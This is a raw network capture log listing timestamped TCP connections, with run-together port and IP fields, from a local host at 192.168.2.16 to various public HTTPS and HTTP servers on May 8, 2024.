                                                                                                                                      May 8, 2024 20:12:43.426611900 CEST44349744104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.426915884 CEST49744443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:43.426973104 CEST44349744104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.427052975 CEST49744443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:43.432322979 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.432538033 CEST49745443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:43.432549000 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.432914019 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.433196068 CEST49745443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:43.433279991 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.433346987 CEST49745443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:43.433362007 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.433398962 CEST49745443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:43.468135118 CEST44349744104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.476118088 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.801554918 CEST44349744104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.801626921 CEST44349744104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:43.801687002 CEST49744443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:43.802151918 CEST49744443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:43.802172899 CEST44349744104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.133570910 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.133712053 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.133774042 CEST49745443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.134619951 CEST49745443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.134635925 CEST44349745104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.141951084 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.141990900 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.142052889 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.142432928 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.142445087 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.144431114 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.144465923 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.144519091 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.144823074 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      May 8, 2024 20:12:44.144850969 CEST44349748151.101.66.137192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.144900084 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      May 8, 2024 20:12:44.145073891 CEST49749443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:44.145108938 CEST44349749104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.145150900 CEST49749443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:44.145360947 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.145375013 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.145536900 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      May 8, 2024 20:12:44.145554066 CEST44349748151.101.66.137192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.145678043 CEST49749443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:44.145689964 CEST44349749104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.379492044 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.379525900 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.379615068 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.379817009 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.379827976 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.416707993 CEST44349728172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.416774035 CEST44349728172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.416827917 CEST49728443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:12:44.475538015 CEST44349748151.101.66.137192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.475832939 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      May 8, 2024 20:12:44.475850105 CEST44349748151.101.66.137192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.476264954 CEST44349748151.101.66.137192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.476560116 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      May 8, 2024 20:12:44.476615906 CEST44349748151.101.66.137192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.477739096 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.477814913 CEST44349749104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.477910042 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.477933884 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.478017092 CEST49749443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:44.478041887 CEST44349749104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.478319883 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.478487015 CEST44349749104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.478579044 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.478634119 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.478794098 CEST49749443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:44.478876114 CEST44349749104.17.2.184192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.478935957 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.478951931 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.479274035 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.479439020 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.479451895 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.479770899 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.480021000 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.480087996 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.529263973 CEST49749443192.168.2.16104.17.2.184
                                                                                                                                      May 8, 2024 20:12:44.529268980 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      May 8, 2024 20:12:44.529282093 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.715106010 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.715478897 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.715497017 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.716545105 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.716741085 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.717103958 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.717185020 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.717309952 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.717323065 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.769390106 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:44.945710897 CEST4969780192.168.2.16199.232.214.172
                                                                                                                                      May 8, 2024 20:12:44.945753098 CEST4969880192.168.2.16199.232.214.172
                                                                                                                                      May 8, 2024 20:12:45.108279943 CEST8049698199.232.214.172192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.108325958 CEST8049698199.232.214.172192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.108532906 CEST4969880192.168.2.16199.232.214.172
                                                                                                                                      May 8, 2024 20:12:45.108827114 CEST8049697199.232.214.172192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.111850977 CEST8049697199.232.214.172192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.111921072 CEST4969780192.168.2.16199.232.214.172
                                                                                                                                      May 8, 2024 20:12:45.180963993 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.181046963 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.181159973 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.181200027 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.181227922 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.182316065 CEST49746443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.182332039 CEST44349746104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.197283030 CEST49728443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:12:45.197329044 CEST44349728172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.197693110 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.197738886 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.197815895 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.198081970 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.198095083 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.198348999 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.198367119 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.454538107 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.454629898 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.454700947 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.458379984 CEST49750443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.458412886 CEST44349750104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.532427073 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.532776117 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.532788038 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.533138037 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.533519983 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:45.533580065 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:45.584244967 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:46.063563108 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:46.063615084 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.063699007 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:46.064239025 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:46.064253092 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.356050014 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.356183052 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.356256962 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:46.356261969 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.356309891 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:46.356791019 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:46.356811047 CEST44349747104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.356821060 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:46.356857061 CEST49747443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:46.359452963 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:46.359515905 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.574310064 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.574465990 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:46.576136112 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:46.576143980 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.576387882 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:46.577809095 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:46.624125004 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.073929071 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.073973894 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.073990107 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.074110031 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:47.074145079 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.074170113 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.074356079 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:47.077332020 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:47.077356100 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.077368975 CEST49752443192.168.2.1620.114.59.183
                                                                                                                                      May 8, 2024 20:12:47.077373981 CEST4434975220.114.59.183192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.571729898 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.571836948 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.571870089 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.571888924 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.571902037 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.571953058 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.571957111 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.572072983 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.572110891 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.572114944 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.572647095 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.572688103 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.572690010 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.572696924 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.572731972 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.573527098 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.573594093 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.573618889 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.573647976 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.573652983 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.573694944 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.574347973 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.574448109 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.574476957 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.574493885 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.574498892 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.574539900 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.611268044 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.611551046 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.611583948 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.611598015 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.611604929 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.611654997 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.612065077 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.612132072 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.612159967 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.612174988 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.612179995 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.612226963 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.755157948 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.755342007 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.755371094 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.755388021 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.755403996 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.755443096 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.755882978 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.755965948 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.756011963 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.756016970 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.756772995 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.756830931 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.756833076 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.756839991 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.756892920 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.756897926 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.757446051 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.757476091 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.757499933 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.757503986 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.757541895 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.758353949 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.758420944 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.759114981 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.759211063 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.760032892 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.760088921 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.760879040 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.760926962 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.760931015 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.761013031 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.761056900 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.761204004 CEST49751443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.761224031 CEST44349751104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.774559021 CEST49753443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.774595976 CEST44349753104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.774653912 CEST49753443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.775353909 CEST49754443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.775392056 CEST44349754104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.775456905 CEST49754443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.775815010 CEST49755443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.775839090 CEST44349755104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.775902987 CEST49755443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.776397943 CEST49756443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.776422977 CEST44349756104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.776499987 CEST49756443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.776618004 CEST49757443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.776637077 CEST44349757104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.776680946 CEST49757443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.776894093 CEST49758443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.776926994 CEST44349758104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.776974916 CEST49758443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.777142048 CEST49753443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.777158022 CEST44349753104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.777496099 CEST49754443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.777512074 CEST44349754104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.777667046 CEST49755443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.777688026 CEST44349755104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.778158903 CEST49756443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.778172970 CEST44349756104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.778650045 CEST49757443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.778662920 CEST44349757104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.778894901 CEST49758443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:47.778911114 CEST44349758104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.938327074 CEST49759443192.168.2.16142.250.69.196
                                                                                                                                      May 8, 2024 20:12:47.938365936 CEST44349759142.250.69.196192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.938447952 CEST49759443192.168.2.16142.250.69.196
                                                                                                                                      May 8, 2024 20:12:47.938688993 CEST49759443192.168.2.16142.250.69.196
                                                                                                                                      May 8, 2024 20:12:47.938705921 CEST44349759142.250.69.196192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.947263002 CEST49760443192.168.2.1699.86.38.103
                                                                                                                                      May 8, 2024 20:12:47.947300911 CEST4434976099.86.38.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.947415113 CEST49760443192.168.2.1699.86.38.103
                                                                                                                                      May 8, 2024 20:12:47.947581053 CEST49760443192.168.2.1699.86.38.103
                                                                                                                                      May 8, 2024 20:12:47.947597980 CEST4434976099.86.38.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.117322922 CEST44349755104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.117683887 CEST49755443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.117701054 CEST44349755104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.119093895 CEST44349755104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.119205952 CEST49755443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.119486094 CEST49755443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.119596004 CEST44349755104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.119646072 CEST49755443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.119652987 CEST44349755104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.121197939 CEST44349757104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.121510983 CEST49757443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.121531963 CEST44349757104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.121684074 CEST44349756104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.121865034 CEST49756443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.121879101 CEST44349756104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.121959925 CEST44349758104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.122220039 CEST44349753104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.122309923 CEST44349754104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.122627974 CEST44349757104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.122692108 CEST49757443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.123011112 CEST49758443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.123042107 CEST44349758104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.123054028 CEST44349756104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.123131037 CEST49756443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.123302937 CEST49757443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.123374939 CEST44349757104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.123514891 CEST49754443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.123534918 CEST44349754104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.123610973 CEST49753443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.123625040 CEST44349753104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.123878956 CEST49756443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.123912096 CEST44349754104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.123951912 CEST44349756104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.123997927 CEST44349753104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.124016047 CEST49757443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:12:48.124023914 CEST44349757104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:12:48.124085903 CEST49756443192.168.2.16104.21.15.140
